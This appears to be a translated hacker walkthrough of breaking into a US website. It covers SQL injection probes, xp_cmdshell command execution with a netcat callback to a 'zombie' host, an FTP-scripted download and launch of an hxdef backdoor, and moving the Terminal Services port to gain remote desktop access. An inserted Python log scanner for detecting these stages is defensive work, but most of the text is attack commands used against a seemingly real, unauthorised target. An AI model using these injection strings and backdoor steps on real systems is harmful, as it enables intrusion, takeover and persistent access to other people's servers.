A walkthrough of penetrating a US website through injection
Author: Rover [play8.net]
I've read a lot of injection articles over the past few days, so I'm ready to find a site to inject. I'm from China; not patriotic; nobody gets to scold me for it.
The most basic requirement for injection is an injection point. Where do I find that many injection points? I thought of Google.
I picked a classic injection-point suffix, .asp?id=8, selected "search all web pages", and got a big page of English-language results.
Test them by hand, one by one:
http://xxx.com/list.asp?id=8'
If single quotes are filtered, the normal page comes back.
After going through a lot of websites, I finally found a legendary injection point.
http://www.sssd.com/program_detail.asp?id=8'
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
Good, that means injection is very likely, and better still, it's MSSQL.
Test again:
http://www.sssd.com/program_detail.asp?id=8 and 0<>(select @@version)--
This returns the other side's OS version and the SQL Server version.
It returns:
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)' to a column of data type int.
/program_detail.asp, line 15
Well, it's NT 5.0 + SP4. We're not picky about the Americans.
Check whether the SQL account the web page uses has dbo rights. If so, we can probably use xp_cmdshell to run system commands.
http://www.sssd.com/program_detail.asp?id=8 and user_name()='dbo'
The normal page comes back. Hoho, that means the site connects with an SQL Server account that has dbo rights.
The next step is getting system privileges.
The usual method on the net is to get the physical path of the web root and then upload a webshell.
But none of the methods I've seen could reveal the web path on this remote host.
I asked 13K for a path-dumping snippet that is supposedly all-powerful:
http://www.sssd.com/program_detail.asp?id=8;create table [dbo].[13K]([fuck] [char](255));--
http://www.sssd.com/program_detail.asp?id=8;declare @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into 13K(fuck) values(@result);--
http://www.sssd.com/program_detail.asp?id=8 and (select top 1 fuck from 13K)=1
This code reads the other side's web path out of the registry and writes it into a table, then queries that table so the path shows up in the web page's error. But the code didn't work at all; the second statement throws an error.
If that doesn't work, change the approach: check whether the other side has removed the xp_cmdshell extended procedure.
Listen on port 99 on my zombie:
nc -l -vv -p 99
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'telnet <zombie IP> 99';--
Right away the nc on my zombie gets a connection. Haha, xp_cmdshell is there. Then:
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'net start TlntSvr';--
to start the Telnet service.
The normal page comes back, which means our command probably ran.
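From the defender's side, every stage above (the quote probe, the @@version cast error, the user_name()='dbo' check, and the stacked exec of xp_cmdshell) is visible in the web server's request log. As an added example that is not part of the original article, here is a Python scan over constructed IIS W3C-style log lines (sample data, not real traffic) that flags each stage per client IP and escalates once command execution appears:

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style lines (sample data): date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2004-05-01 10:00:01 198.51.100.7 GET /program_detail.asp id=8 200
2004-05-01 10:00:02 198.51.100.7 GET /program_detail.asp id=8' 500
2004-05-01 10:00:05 198.51.100.7 GET /program_detail.asp id=8+and+0<>(select+@@version)-- 500
2004-05-01 10:00:09 198.51.100.7 GET /program_detail.asp id=8+and+user_name()='dbo' 200
2004-05-01 10:00:20 198.51.100.7 GET /program_detail.asp id=8;exec+master.dbo.xp_cmdshell+'net+start+TlntSvr';-- 200
2004-05-01 10:01:00 203.0.113.9 GET /program_detail.asp id=12 200
"""

# One rule per stage of the probing sequence described in the article.
RULES = [
    ("quote_probe", re.compile(r"=\d+'\s*$")),                 # id=8' -> ODBC syntax error
    ("version_probe", re.compile(r"@@version", re.I)),         # version leaked via cast error
    ("dbo_check", re.compile(r"user_name\s*\(\s*\)\s*=\s*'dbo'", re.I)),
    ("stacked_xp", re.compile(r";\s*(exec|declare)\b.*\bxp_(cmdshell|regread)\b", re.I | re.S)),
]

def parse_line(line):
    """Return (client ip, decoded query, status) or None if the line does not fit the layout."""
    fields = line.split()
    if len(fields) != 7:
        return None
    return fields[2], unquote_plus(fields[5]), int(fields[6])

def classify(query):
    # Names of every stage whose pattern appears in the decoded query string.
    return [name for name, rx in RULES if rx.search(query)]

def scan(log_text):
    # Map client IP -> list of (stage, decoded query, status) for every flagged request.
    hits = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, query, status = rec
        for stage in classify(query):
            hits.setdefault(ip, []).append((stage, query, status))
    return hits

def severity(ip_hits):
    """Escalate by the furthest stage reached: command execution outranks reconnaissance."""
    stages = {stage for stage, _, _ in ip_hits}
    if "stacked_xp" in stages:
        return "critical"
    if stages & {"dbo_check", "version_probe"}:
        return "high"
    return "medium" if stages else "none"
```

A 500 status paired with a quote_probe or version_probe hit is the same ODBC error the article relies on, so the status column is kept alongside each hit for triage.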
Damn: telnet www.sssd.com, and the system tells me it can't connect to port 23 on the remote host.
Depressing. Looks like the other side has filtered the port.
Since we can execute system commands, let's go the shell route. Haha.
First configure a backdoor. I use hxdef100 (it gets through firewalls, I like it); configure it, then make it install itself automatically with install.cmd: use WinRAR to build a self-extracting package that runs install.cmd after extraction, and install.cmd installs the backdoor.
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'echo open ftpserver port> t.t';--
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'echo user>> c:\t.t';--
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'echo pass>> c:\t.t';--
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'echo get rover.exe>> c:\t.t';--
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'echo bye>> c:\t.t';--
That writes an FTP batch file. Haha. Then we execute:
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'ftp -s:t.t';--
rover.exe is the configured backdoor. The normal page comes back, so it has probably been downloaded.
Run the backdoor:
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'rover.exe';--
OK, now use the backdoor client to connect to the host on port 80 and enter the password. Hoho, a shell appears.
With admin rights, net start shows the remote side has the Terminal Services service running. Upload terninalport.exe (a small tool for viewing and changing the Terminal Service port) and it shows the port is 3389.
telnet www.sssd.com 3389 says the connection can't be made. Damn, filtered. God.
At that point I guessed it was a firewall on the other host. Uploaded pskill and fport.exe to kill suspicious processes; telnet 3389 again, still nothing. Tried again. When I saw the WinVNC remote-control software installed on his host, I boldly guessed the administrator used it, and damn, telnet www.sssd.com 5800 goes through. Weird administrator: no proper Terminal Services management, uses VNC instead. Ugh.
pskill WinVNC
Kill the WinVNC process and delete the WinVNC service files. Damn, it starts up again.
Finally:
terninalport 5800
Change the terminal port to 5800 and reboot the system.
Two minutes later I connected to www.sssd.com:5800 through Terminal Services successfully. Hoho.
Once in, I found that this host had no firewall or IPsec policy at all; the port filtering was all done on the router. Damn.
There is nothing technical in this article, it's just an idea. Hope it's useful to you.